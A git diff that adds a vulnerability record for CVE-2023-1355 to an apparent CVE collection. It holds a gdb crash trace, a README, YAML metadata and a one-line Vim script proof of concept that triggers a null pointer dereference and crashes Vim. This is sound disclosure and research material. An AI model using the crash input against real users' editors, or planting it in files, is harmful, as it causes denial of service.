diff --git a/cve/vim/2023/CVE-2023-1355/Debug.txt b/cve/vim/2023/CVE-2023-1355/Debug.txt new file mode 100644 index 0000000000000000000000000000000000000000..487810bac814b52c17a51701a8c6e7bc99ca42fb --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/Debug.txt @@ -0,0 +1,108 @@ +gdb-peda$ r -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +Starting program: /home/user/recentvim/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGSEGV, Segmentation fault. +Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. +Use 'set logging enabled off'. + +Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. +Use 'set logging enabled on'. + + +[----------------------------------registers-----------------------------------] +RAX: 0x0 +RBX: 0x0 +RCX: 0x2 +RDX: 0x55555569ba29 (: endbr64) +RSI: 0x0 +RDI: 0x555555969673 --> 0x210000000061 ('a') +RBP: 0x7fffffffbc80 --> 0x7fffffffbd20 --> 0x7fffffffbda0 --> 0x7fffffffbe20 --> 0x7fffffffbeb0 --> 0x7fffffffbff0 (--> ...) +RSP: 0x7fffffffb9f0 --> 0x100000000 +RIP: 0x5555558074d1 (: mov eax,DWORD PTR [rax+0x40]) +R8 : 0x1 +R9 : 0x55555596c710 ("E1004: White space required before and after '=' at \"\t=null_class.a\"") +R10: 0x55555596ccc0 --> 0x570 +R11: 0xa ('\n') +R12: 0x7fffffffddf8 --> 0x7fffffffe1fe ("/home/user/recentvim/vim/src/vim") +R13: 0x55555588a9b7 (
: endbr64) +R14: 0x555555906038 --> 0x55555558cac0 (<__do_global_dtors_aux>: endbr64) +R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f +EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x5555558074c1 : jmp 0x55555580750d + 0x5555558074c3 : add DWORD PTR [rbp-0x254],0x1 + 0x5555558074ca : mov rax,QWORD PTR [rbp-0x238] +=> 0x5555558074d1 : mov eax,DWORD PTR [rax+0x40] + 0x5555558074d4 : cmp DWORD PTR [rbp-0x254],eax + 0x5555558074da : jl 0x5555558073be + 0x5555558074e0 : mov rax,QWORD PTR [rbp-0x238] + 0x5555558074e7 : mov rax,QWORD PTR [rax] +[------------------------------------stack-------------------------------------] +0000| 0x7fffffffb9f0 --> 0x100000000 +0008| 0x7fffffffb9f8 --> 0x7fffffffc510 --> 0x1 +0016| 0x7fffffffba00 --> 0x7fffffffc500 --> 0x10 +0024| 0x7fffffffba08 --> 0x7fffffffc440 --> 0x555555969673 --> 0x210000000061 ('a') +0032| 0x7fffffffba10 --> 0x0 +0040| 0x7fffffffba18 --> 0x0 +0048| 0x7fffffffba20 --> 0x0 +0056| 0x7fffffffba28 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356 +1356 for (int i = 0; i < cl->class_class_member_count; ++i) +gdb-peda$ bt +#0 0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356 +#1 0x00005555555f3045 in handle_subscript (arg=0x7fffffffc440, name_start=0x0, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at eval.c:6934 +#2 0x00005555555ee0f3 in eval9 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:4310 +#3 0x00005555555ed2bb in eval8 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3840 +#4 0x00005555555ecd0b in eval7 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3644 +#5 0x00005555555ec452 in eval6 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3423 +#6 0x00005555555ec114 in eval5 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3312 +#7 0x00005555555ebbe8 in eval4 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3163 +#8 0x00005555555eb6f7 in eval3 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3024 +#9 0x00005555555eb21f in eval2 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2898 +#10 0x00005555555eaad2 in eval1 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2744 +#11 0x00005555555ea85a in eval0_retarg (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510, retarg=0x0) at eval.c:2655 +#12 0x00005555555ea69b in eval0 (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510) at eval.c:2589 +#13 0x0000555555608779 in ex_let (eap=0x7fffffffc6a0) at evalvars.c:1149 +#14 0x0000555555607eb8 in ex_var (eap=0x7fffffffc6a0) at evalvars.c:960 +#15 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffc8d0, flags=0x7, cstack=0x7fffffffc9b0, fgetline=0x55555575fe37 , cookie=0x7fffffffd120) at ex_docmd.c:2580 +#16 0x000055555562009e in do_cmdline (cmdline=0x55555596c350 "vim9@_\t=null_class.a", fgetline=0x55555575fe37 , cookie=0x7fffffffd120, flags=0x7) at ex_docmd.c:993 +#17 0x000055555575eca8 in do_source_ext (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0) at scriptfile.c:1759 +#18 0x000055555575f3a3 in do_source (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905 +#19 0x000055555575de5f in cmd_source (fname=0x555555968893 "poc", eap=0x7fffffffd2d0) at scriptfile.c:1250 +#20 0x000055555575dea6 in ex_source (eap=0x7fffffffd2d0) at scriptfile.c:1276 +#21 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffd500, flags=0xb, cstack=0x7fffffffd5e0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#22 0x000055555562009e in do_cmdline (cmdline=0x555555968850 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993 +#23 0x000055555561f535 in do_cmdline_cmd (cmd=0x555555968850 "so poc") at ex_docmd.c:587 +#24 0x000055555588e6da in exe_commands (parmp=0x555555953800 ) at main.c:3146 +#25 0x000055555588b50f in vim_main2 () at main.c:782 +#26 0x000055555588ae7c in main (argc=0xf, argv=0x7fffffffddf8) at main.c:433 +#27 0x00007ffff7c29d90 in __libc_start_call_main (main=main@entry=0x55555588a9b7
, argc=argc@entry=0xf, argv=argv@entry=0x7fffffffddf8) at ../sysdeps/nptl/libc_start_call_main.h:58 +#28 0x00007ffff7c29e40 in __libc_start_main_impl (main=0x55555588a9b7
, argc=0xf, argv=0x7fffffffddf8, init=, fini=, rtld_fini=, + stack_end=0x7fffffffdde8) at ../csu/libc-start.c:392 +#29 0x000055555558ca45 in _start () +gdb-peda$ p cl +$1 = (class_T *) 0x0 +gdb-peda$ p *(typval_T *) rettv +$2 = { + v_type = VAR_CLASS, + v_lock = 0x0, + vval = { + v_number = 0x0, + v_float = 0, + v_string = 0x0, + v_list = 0x0, + v_dict = 0x0, + v_partial = 0x0, + v_job = 0x0, + v_channel = 0x0, + v_blob = 0x0, + v_instr = 0x0, + v_class = 0x0, + v_object = 0x0 + } +} \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt b/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt new file mode 100644 index 0000000000000000000000000000000000000000..59c79dad42e97098499aa62b31b1afdb9745d096 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/Proof of Concept.txt @@ -0,0 +1,2 @@ +$ ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +Segmentation fault (core dumped) \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-1355/README.md b/cve/vim/2023/CVE-2023-1355/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a075b8c79835968ef81a37c1c533cfaa371ebfc0 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/README.md @@ -0,0 +1,13 @@ + **Description** +null pointer dereference in class_object_index at vim9class.c:1356 +variable cl in class_object_index at vim9class.c:1254 is NULL +at last, reference to cl refers to NULL + + **References to Advisories, Solutions, and Tools** +By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov + +Hyperlink + +https://github.com/vim/vim/commit/d13dd30240e32071210f55b587182ff48757ea46 + +https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9 \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-1355/poc.txt b/cve/vim/2023/CVE-2023-1355/poc.txt new file mode 100644 index 0000000000000000000000000000000000000000..dc324c15affd456e82b513ec905a63acac2d3c79 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/poc.txt @@ -0,0 +1 @@ +vim9@_ =null_class.a \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml new file mode 100644 index 0000000000000000000000000000000000000000..a954b3dfae4d14d0cf4bf63f0adc75df6f6b5243 --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-1355 +source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9 +info: + name: Vim是一款基于UNIX平台的编辑器,由vi发展而来。 + severity: medium + description: + GitHub存储库vim/vim中的NULL指针解引用。 + scope-of-influence: + vim < 9.0.1402 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-1355 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2023-1355 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None + tags: cve2023 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 428354b052e24bcd706182b37e638525cdc3550c..bc5382db27d0c7926d2a172b9c6f1aa9d48c2546 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -32,4 +32,6 @@ cve: - CVE-2022-0529 django: - CVE-2022-34265 + vim: + - CVE-2023-1355 cnvd: